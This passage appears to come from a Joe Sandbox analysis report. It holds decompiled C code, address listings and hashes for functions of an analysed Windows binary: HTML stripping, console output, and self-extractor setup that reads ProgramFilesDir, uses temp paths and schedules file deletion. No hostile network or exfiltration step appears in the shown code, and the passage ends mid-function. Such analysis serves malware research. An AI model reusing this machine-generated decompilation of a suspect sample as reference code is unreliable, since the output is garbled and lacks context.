                • Instruction ID: 3333983dd2f9cb041bff613c14cd9bedf37caf969e6f40cdbd4045086485eb8f
                • Opcode Fuzzy Hash: fb1865f790fa67e6ff07cfcb19b2833da606a1c16c39bac1a46f6f25667e6fae
                • Instruction Fuzzy Hash: 40F118726183815BCB17DB24A495BFB779A5FA0300F08056BFE869F383CB649946C762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E003E9CFE(void* __eflags, signed short* _a4) {
				signed int* _v4;
				intOrPtr _v8;
				void* __ecx;
				signed int* _t17;
				signed int _t18;
				void* _t21;
				void* _t22;
				void* _t24;
				signed short _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed short* _t29;
				void* _t30;
				signed int _t31;
				signed int _t32;
				void* _t33;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed short _t45;
				signed int _t47;
				short _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed short* _t53;
				signed int* _t55;
				short* _t56;
				short* _t57;
				signed short* _t58;
				signed int* _t59;
				intOrPtr _t60;
				signed int* _t77;

				_t58 = _a4;
				_push(2 + E003F3E13(_t58) * 2);
				_t17 = E003F3E33(_t38);
				_t59 = _t17;
				_v4 = _t59;
				if(_t59 == 0) {
					return _t17;
				}
				_t18 = E003E95AA(_t58);
				_t42 =  *_t58 & 0x0000ffff;
				_t36 = _t18;
				_t55 = _t59;
				if(_t42 == 0) {
					L47:
					return _t59;
				} else {
					_push(0xd);
					_push(0x20);
					_v8 = 0x3e;
					do {
						_t43 = _t42 & 0x0000ffff;
						while(_t43 != 0x3c) {
							if(_t36 == 0) {
								L11:
								_t36 = 0;
								__eflags = 0;
								if(0 == 0) {
									L20:
									_t27 =  *_t58 & 0x0000ffff;
									__eflags = _t27;
									if(__eflags == 0) {
										L27:
										_t28 =  *_t58 & 0x0000ffff;
										_t52 = 0x20;
										_t43 = _t28;
										_t72 = _t28;
										_t26 = 0xd;
										if(_t28 != 0) {
											continue;
										}
										break;
									}
									__eflags = _t27 - _t52;
									if(__eflags != 0) {
										L24:
										 *_t55 = _t27;
										L25:
										_t55 =  &(_t55[0]);
										L26:
										_t58 =  &(_t58[1]);
										goto L27;
									}
									__eflags = _t55 - _t59;
									if(__eflags == 0) {
										goto L24;
									}
									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
									if(__eflags == 0) {
										goto L26;
									}
									goto L24;
								}
								__eflags = _t43 - 0x26;
								if(_t43 != 0x26) {
									goto L20;
								}
								_t29 = 0;
								__eflags = 0;
								do {
									_t53 = _t29 + _t58;
									_t47 =  *_t53 & 0x0000ffff;
									__eflags = _t47;
									if(_t47 == 0) {
										break;
									}
									__eflags = _t47 - 0x3b;
									if(_t47 == 0x3b) {
										_t8 =  &(_t53[1]); // 0x22
										_t58 = _t8;
										_t36 = 1;
									}
									_t29 = _t29 + 2;
									__eflags = _t29 - 0x28;
								} while (_t29 < 0x28);
								__eflags = _t36;
								if(__eflags != 0) {
									goto L27;
								}
								_t52 = 0x20;
								goto L20;
							}
							if(_t43 == _t26) {
								L8:
								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
									 *_t55 = _t52;
									goto L25;
								} else {
									goto L26;
								}
							}
							_t30 = 0xa;
							if(_t43 != _t30) {
								goto L11;
							}
							goto L8;
						}
						_t21 = E003E1FDD(_t72, _t58, L"</p>", 4);
						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
						_t74 = _t21;
						if(_t21 == 0 || E003E1FDD(_t74, _t58, L"<br>", 4) == 0) {
							_t44 = 0xd;
							_t22 = 2;
							 *_t55 = _t44;
							_t56 = _t55 + _t22;
							_t49 = 0xa;
							 *_t56 = _t49;
							_t55 = _t56 + _t22;
							if(_t36 != 0) {
								 *_t55 = _t44;
								_t57 = _t55 + _t22;
								 *_t57 = _t49;
								_t55 = _t57 + _t22;
								_t77 = _t55;
							}
						}
						 *_t55 = 0;
						_t24 = E003E1FDD(_t77, _t58, L"<style>", 7);
						_t45 =  *_t58 & 0x0000ffff;
						_t50 = _t45;
						if(_t24 != 0) {
							_t51 = _t45;
							__eflags = _t45;
							if(_t45 == 0) {
								L44:
								_t25 = _t51 & 0x0000ffff;
								__eflags = _t51 - _v8;
								if(__eflags == 0) {
									_t58 =  &(_t58[1]);
									__eflags = _t58;
									_t25 =  *_t58 & 0x0000ffff;
								}
								goto L46;
							}
							_t60 = _v8;
							while(1) {
								_t51 = _t45 & 0x0000ffff;
								__eflags = _t45 - _t60;
								if(_t45 == _t60) {
									break;
								}
								_t58 =  &(_t58[1]);
								_t31 =  *_t58 & 0x0000ffff;
								_t45 = _t31;
								_t51 = _t31;
								__eflags = _t31;
								if(_t31 != 0) {
									continue;
								}
								break;
							}
							_t59 = _v4;
							goto L44;
						} else {
							_t32 = _t50;
							_t79 = _t45;
							if(_t45 == 0) {
								L38:
								_t25 = _t32 & 0x0000ffff;
								goto L46;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t33 = E003E1FDD(_t79, _t58, L"</style>", 8);
								_t58 =  &(_t58[1]);
								if(_t33 == 0) {
									break;
								}
								_t32 =  *_t58 & 0x0000ffff;
								if(_t32 != 0) {
									continue;
								}
								goto L38;
							}
							_t58 =  &(_t58[7]);
							__eflags = _t58;
							_t32 =  *_t58 & 0x0000ffff;
							goto L38;
						}
						L46:
						_t52 = 0x20;
						_t42 = _t25 & 0x0000ffff;
						_t26 = 0xd;
					} while (_t25 != 0);
					goto L47;
				}
			}







































                0x003e9d02
                0x003e9d16
                0x003e9d17
                0x003e9d1c
                0x003e9d1e
                0x003e9d26
                0x003e9ecb
                0x003e9ecb
                0x003e9d30
                0x003e9d35
                0x003e9d38
                0x003e9d3a
                0x003e9d3f
                0x003e9ec3
                0x00000000
                0x003e9d45
                0x003e9d45
                0x003e9d48
                0x003e9d4b
                0x003e9d53
                0x003e9d53
                0x003e9d56
                0x003e9d62
                0x003e9d80
                0x003e9d80
                0x003e9d82
                0x003e9d84
                0x003e9db2
                0x003e9db2
                0x003e9db5
                0x003e9db8
                0x003e9dd2
                0x003e9dd2
                0x003e9dd7
                0x003e9dda
                0x003e9ddc
                0x003e9ddf
                0x003e9de0
                0x00000000
                0x00000000
                0x00000000
                0x003e9de0
                0x003e9dba
                0x003e9dbd
                0x003e9dc9
                0x003e9dc9
                0x003e9dcc
                0x003e9dcc
                0x003e9dcf
                0x003e9dcf
                0x00000000
                0x003e9dcf
                0x003e9dbf
                0x003e9dc1
                0x00000000
                0x00000000
                0x003e9dc3
                0x003e9dc7
                0x00000000
                0x00000000
                0x00000000
                0x003e9dc7
                0x003e9d86
                0x003e9d8a
                0x00000000
                0x00000000
                0x003e9d8c
                0x003e9d8c
                0x003e9d8e
                0x003e9d8e
                0x003e9d91
                0x003e9d94
                0x003e9d97
                0x00000000
                0x00000000
                0x003e9d99
                0x003e9d9c
                0x003e9d9e
                0x003e9d9e
                0x003e9da1
                0x003e9da1
                0x003e9da3
                0x003e9da6
                0x003e9da6
                0x003e9dab
                0x003e9dad
                0x00000000
                0x00000000
                0x003e9db1
                0x00000000
                0x003e9db1
                0x003e9d67
                0x003e9d71
                0x003e9d73
                0x003e9d7b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e9d73
                0x003e9d6b
                0x003e9d6f
                0x00000000
                0x00000000
                0x00000000
                0x003e9d6f
                0x003e9dee
                0x003e9df5
                0x003e9df8
                0x003e9dfa
                0x003e9e0f
                0x003e9e12
                0x003e9e13
                0x003e9e16
                0x003e9e1a
                0x003e9e1b
                0x003e9e1e
                0x003e9e22
                0x003e9e24
                0x003e9e27
                0x003e9e29
                0x003e9e2c
                0x003e9e2c
                0x003e9e2c
                0x003e9e22
                0x003e9e38
                0x003e9e3b
                0x003e9e40
                0x003e9e43
                0x003e9e47
                0x003e9e7b
                0x003e9e7d
                0x003e9e80
                0x003e9ea1
                0x003e9ea1
                0x003e9ea4
                0x003e9ea9
                0x003e9eab
                0x003e9eab
                0x003e9eae
                0x003e9eae
                0x00000000
                0x003e9ea9
                0x003e9e82
                0x003e9e86
                0x003e9e86
                0x003e9e89
                0x003e9e8c
                0x00000000
                0x00000000
                0x003e9e8e
                0x003e9e91
                0x003e9e94
                0x003e9e96
                0x003e9e98
                0x003e9e9b
                0x00000000
                0x00000000
                0x00000000
                0x003e9e9b
                0x003e9e9d
                0x00000000
                0x003e9e49
                0x003e9e49
                0x003e9e4b
                0x003e9e4e
                0x003e9e76
                0x003e9e76
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003e9e50
                0x003e9e50
                0x003e9e58
                0x003e9e5d
                0x003e9e62
                0x00000000
                0x00000000
                0x003e9e64
                0x003e9e6c
                0x00000000
                0x00000000
                0x00000000
                0x003e9e6e
                0x003e9e70
                0x003e9e70
                0x003e9e73
                0x00000000
                0x003e9e73
                0x003e9eb1
                0x003e9eb3
                0x003e9eb6
                0x003e9ebc
                0x003e9ebc
                0x00000000
                0x003e9d53

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: </p>$</style>$<br>$<style>$>
                • API String ID: 176396367-3568243669
                • Opcode ID: 8452bdd56516e4927ccdb3deabf5a3376e02ebc2a95b056a44d7dcebf271ec27
                • Instruction ID: e81dd6ad98059f443efe9252e8fecec6bc2261e4dc81273a778799bd90db89e8
                • Opcode Fuzzy Hash: 8452bdd56516e4927ccdb3deabf5a3376e02ebc2a95b056a44d7dcebf271ec27
                • Instruction Fuzzy Hash: DA51F5666403F295DB329A279C1177773A4DFA1750F6A072BEA819B1C0FBA58C818361
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E003FF68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x432290 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0x432290 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E003FA767(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0x432290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0x432290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x432290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E003F930D( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E003F930D();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									_t48 = _t130 + 8; // 0xff76e900
									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E003EFBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
			}





































                0x003ff695
                0x003ff69c
                0x003ff69f
                0x003ff6a7
                0x003ff6ab
                0x003ff6b7
                0x003ff6ba
                0x003ff6bd
                0x003ff6c4
                0x003ff6cc
                0x003ff6cf
                0x003ff6d5
                0x003ff6db
                0x003ff6e0
                0x003ff6e2
                0x003ff6e5
                0x003ff6ea
                0x003ff6f4
                0x003ff6fb
                0x003ff6fe
                0x003ff705
                0x003ff70c
                0x003ff727
                0x003ff72f
                0x003ff738
                0x003ff75e
                0x003ff760
                0x00000000
                0x003ff73a
                0x003ff73d
                0x003ff804
                0x003ff810
                0x003ff81b
                0x003ff820
                0x003ff743
                0x003ff74a
                0x003ff74f
                0x003ff755
                0x003ff75b
                0x00000000
                0x003ff75b
                0x003ff755
                0x003ff73d
                0x003ff70e
                0x003ff712
                0x003ff715
                0x003ff71b
                0x003ff71d
                0x003ff720
                0x003ff724
                0x003ff761
                0x003ff764
                0x003ff765
                0x003ff76a
                0x003ff770
                0x003ff776
                0x003ff785
                0x003ff78b
                0x003ff791
                0x003ff796
                0x003ff7b2
                0x003ff825
                0x003ff82b
                0x003ff7b4
                0x003ff7b4
                0x003ff7bc
                0x003ff7c5
                0x003ff7cb
                0x00000000
                0x003ff7cd
                0x003ff7cf
                0x003ff7d2
                0x003ff7eb
                0x00000000
                0x003ff7ed
                0x003ff7f1
                0x003ff7f3
                0x003ff7f6
                0x00000000
                0x003ff7f6
                0x003ff7f1
                0x003ff7eb
                0x003ff7cb
                0x003ff7c5
                0x003ff7b2
                0x003ff796
                0x003ff770
                0x00000000
                0x003ff7f9
                0x003ff7f9
                0x003ff82d
                0x003ff83f

                APIs
                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,003FFE02,00000000,00000000,00000000,00000000,00000000,003F529F), ref: 003FF6CF
                • __fassign.LIBCMT ref: 003FF74A
                • __fassign.LIBCMT ref: 003FF765
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 003FF78B
                • WriteFile.KERNEL32(?,00000000,00000000,003FFE02,00000000,?,?,?,?,?,?,?,?,?,003FFE02,00000000), ref: 003FF7AA
                • WriteFile.KERNEL32(?,00000000,00000001,003FFE02,00000000,?,?,?,?,?,?,?,?,?,003FFE02,00000000), ref: 003FF7E3
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: a2c6efc79a7714e47efabdca9cb2525887507084d4e87ca9b51c7181b291800c
                • Instruction ID: 1373e60a7e71b78eeca56a56368fa7074f91014c73d668fab319ce1ceb2c20fe
                • Opcode Fuzzy Hash: a2c6efc79a7714e47efabdca9cb2525887507084d4e87ca9b51c7181b291800c
                • Instruction Fuzzy Hash: 515196B1D002499FCB11CFA4DD45AEEFBF8EF09300F15416AEA55E7251E770A941CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ECE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E003ECE87(intOrPtr __ebx, void* __ecx, void* __edx) {
				intOrPtr _t225;
				void* _t226;
				signed int _t292;
				void* _t294;
				signed int _t295;
				void* _t299;

				L0:
				while(1) {
					L0:
					if(__ebx != 1) {
						goto L123;
					}
					L107:
					__eax = __ebp - 0x788c;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
					__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
					__ebx = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L109:
						_push( *0x40e724);
						__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
						__eax = E003DA231(0x41946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L108:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L110:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
					__eflags =  *(__ebp - 0x588c) - __bx;
					if( *(__ebp - 0x588c) == __bx) {
						while(1) {
							L175:
							_push(0x1000);
							_t213 = _t299 - 0x15; // 0xffffa75f
							_t214 = _t299 - 0xd; // 0xffffa767
							_t215 = _t299 - 0x588c; // 0xffff4ee8
							_t216 = _t299 - 0xf894; // 0xfffeaee0
							_push( *((intOrPtr*)(_t299 + 0xc)));
							_t225 = E003EB314(0x800, _t299);
							_t277 =  *((intOrPtr*)(_t299 + 0x10));
							 *((intOrPtr*)(_t299 + 0xc)) = _t225;
							if(_t225 != 0) {
								_t226 = _t299 - 0x588c;
								_t294 = _t299 - 0x1b894;
								_t292 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E003E1FBB(_t299 - 0xf894,  *((intOrPtr*)(0x40e744 + _t295 * 4))) != 0) {
								_t295 = _t295 + 1;
								if(_t295 < 0xe) {
									continue;
								} else {
									goto L175;
								}
							}
							__eflags = _t295 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t295 * 4 +  &M003ED41B))) {
								case 0:
									L9:
									__eflags = _t277 - 2;
									if(_t277 == 2) {
										E003EA64D(_t299 - 0x788c, 0x800);
										E003DA544(E003DBDF3(__eflags, _t299 - 0x788c, _t299 - 0x588c, _t299 - 0xd894, 0x800), _t277, _t299 - 0x8894, _t295);
										 *(_t299 - 4) = 0;
										E003DA67E(_t299 - 0x8894, _t299 - 0xd894);
										E003D6EDB(_t299 - 0x388c);
										while(1) {
											L23:
											_push(0);
											_t240 = E003DA5D1(_t299 - 0x8894, _t299 - 0x388c);
											__eflags = _t240;
											if(_t240 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t299 - 0x388c, 0);
											__eflags =  *(_t299 - 0x2880);
											if(__eflags == 0) {
												L16:
												_t244 = GetFileAttributesW(_t299 - 0x388c);
												__eflags = _t244 - 0xffffffff;
												if(_t244 == 0xffffffff) {
													continue;
												}
												L17:
												_t246 = DeleteFileW(_t299 - 0x388c);
												__eflags = _t246;
												if(_t246 != 0) {
													continue;
												} else {
													_t297 = 0;
													_push(0);
													goto L20;
													L20:
													E003D4092(_t299 - 0x1044, 0x800, L"%s.%d.tmp", _t299 - 0x388c);
													_t301 = _t301 + 0x14;
													_t251 = GetFileAttributesW(_t299 - 0x1044);
													__eflags = _t251 - 0xffffffff;
													if(_t251 != 0xffffffff) {
														_t297 = _t297 + 1;
														__eflags = _t297;
														_push(_t297);
														goto L20;
													} else {
														_t254 = MoveFileW(_t299 - 0x388c, _t299 - 0x1044);
														__eflags = _t254;
														if(_t254 != 0) {
															MoveFileExW(_t299 - 0x1044, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E003DB991(__eflags, _t299 - 0x788c, _t299 - 0x1044, 0x800);
											E003DB690(__eflags, _t299 - 0x1044, 0x800);
											_t298 = E003F3E13(_t299 - 0x788c);
											__eflags = _t298 - 4;
											if(_t298 < 4) {
												L14:
												_t265 = E003DBDB4(_t299 - 0x588c);
												__eflags = _t265;
												if(_t265 != 0) {
													break;
												}
												L15:
												_t268 = E003F3E13(_t299 - 0x388c);
												__eflags = 0;
												 *((short*)(_t299 + _t268 * 2 - 0x388a)) = 0;
												E003EFFF0(0x800, _t299 - 0x44, 0, 0x1e);
												_t301 = _t301 + 0x10;
												 *((intOrPtr*)(_t299 - 0x40)) = 3;
												_push(0x14);
												_pop(_t271);
												 *((short*)(_t299 - 0x34)) = _t271;
												 *((intOrPtr*)(_t299 - 0x3c)) = _t299 - 0x388c;
												_push(_t299 - 0x44);
												 *0x43307c();
												goto L16;
											}
											L13:
											_t276 = E003F3E13(_t299 - 0x1044);
											__eflags = _t298 - _t276;
											if(_t298 > _t276) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
										E003DA55A(_t299 - 0x8894);
									}
									goto L175;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									} else {
										__eax =  *0x42fc94;
										__eflags = __eax;
										__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
										__eflags = __eax;
										if(__eax != 0) {
											__eax =  *0x42fc94;
											_pop(__ecx);
											_pop(__ecx);
										}
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E003EB48E(__ecx, __edx, __eflags);
											__eax =  *0x42fc94;
										} else {
											__esi = __ebp - 0x588c;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L33:
										__eax = E003F3E13(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x42fc94);
										__eax = E003F3E3E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax == 0) {
											L37:
											__eflags = __bh;
											if(__bh == 0) {
												__eax = L003F3E2E(__esi);
											}
											goto L175;
										}
										L34:
										 *0x42fc94 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										L36:
										__eax = E003F7686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
										goto L37;
									}
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
									}
									goto L175;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									}
									L42:
									__eflags =  *0x41a472 - __di;
									if( *0x41a472 != __di) {
										goto L175;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x588c;
									_push(0x22);
									 *(__ebp - 0x1044) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x588c) - __ax;
									if( *(__ebp - 0x588c) == __ax) {
										__edi = __ebp - 0x588a;
									}
									__eax = E003F3E13(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L175;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1044;
												__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1044;
												__edi = 0x41a472;
												E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
												__eax = E003EB1BE(__ebp - 0x1044, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
												__eax = __ebp - 0x1044;
												__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
												}
												goto L175;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x433028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1044;
													_push(__ebp - 0x1044);
													__eax = __ebp - 0x24;
													_push(__ebp - 0x24);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0x433024();
													_push( *(__ebp - 0x1c));
													 *0x433008() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1044) = __cx;
												}
												__eflags =  *(__ebp - 0x1044) - __bx;
												if( *(__ebp - 0x1044) != __bx) {
													__eax = __ebp - 0x1044;
													__eax = E003F3E13(__ebp - 0x1044);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
													}
												}
												__esi = E003F3E13(__edi);
												__eax = __ebp - 0x1044;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L51;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L175;
										}
										L49:
										__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
										goto L63;
									}
								case 4:
									L68:
									__eflags =  *0x41a46c - 1;
									__eflags = __eax - 0x41a46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__edx + 7) & __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x418457 = __cl;
										 *0x418460 = 1;
